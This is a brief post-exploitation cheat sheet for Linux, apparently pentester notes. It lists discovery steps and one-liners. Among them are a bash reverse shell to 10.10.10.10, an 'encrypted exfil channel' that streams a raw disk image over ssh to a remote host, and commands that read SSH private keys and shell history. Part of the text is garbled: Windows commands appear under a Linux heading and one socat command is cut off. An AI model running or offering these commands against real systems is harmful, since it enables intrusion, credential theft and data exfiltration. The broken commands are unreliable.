# Linux Post Exploitation Discovery ## Linux Post Exploitation Discovery ### Description ### Techniques ### Resources * Identify current user ID and privileges * Identify network connections (for lateral movement) * Identify Running processes * Identify Chron jobs/scheduled tasks * Identify if Active Directory environment then identify users/groups/computers if in cloud or on-prem * If not AD, then find applications, firewalls, AV whoami /priv netstat -na | findstr "ESTABLISHED" or "WAITING" arp -a systeminfo | findstr "Domain" * ## Linux Exploits ### Commands Redirect IPv6 listening TCP port to localhost IPv4. ```shell IPV6ADDR=fc00:660:0:1::46 && PORT=110 && socat TCP-LISTEN:$PORT,reuseaddr, fork TCP6:[$IPV6ADDR]:$POR ``` Find Juicy Stuff in the File System ```shell find /PATH/TO/DIRECTORY -name "FILE-FILTER" -type f -exec grep -i "STRING" {} \; -print 2>/dev/null ``` Find public ip ```shell curl -4 icanhazip.com ``` Make output easier to read ```shell alias ccat='pygmentize -O bg=dark,style=colorful' ``` Encrypted Exfil channel ```shell dd if=/dev/rdisk0s1s2 bs=65536 conv=noerror,sync | ssh -C user@10.10.10.10 "cat >/tmp/image.dd" ``` Check service every second ```shell while (true); do nc -vv -z -w3 10.10.10.10 80 > /dev/null && echo -e "Service is up"; sleep 1; done ``` Website Cloner ```shell wget -r -nH $URL ``` Type “gah” after you forgot to use sudo, and it’ll sudo your most recent command. ```shell alias gah='sudo $(history -p \!\!)' ``` Create a reverse shell back to a given IP address and port. ```shell bash -i >& /dev/tcp/10.10.10.10/8080 0>&1 ``` Encode or decode base64 information. ```shell echo 'Hello, World!' | base64 echo 'SGVsbG8sIFdvcmxkIQo=' | base64 -d ``` ### Helpful Commands ```shell cat ~/.bash_history cat ~/.ssh/config cat ~/.ssh/id_rsa cat ~/.ssh/known_hosts ``` ### Linux Post Exploitation Tools * BusyBox * NMAP * Responder.py * tcpdump * * * * * ### Resources * [APT Privilege Escalation](https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/)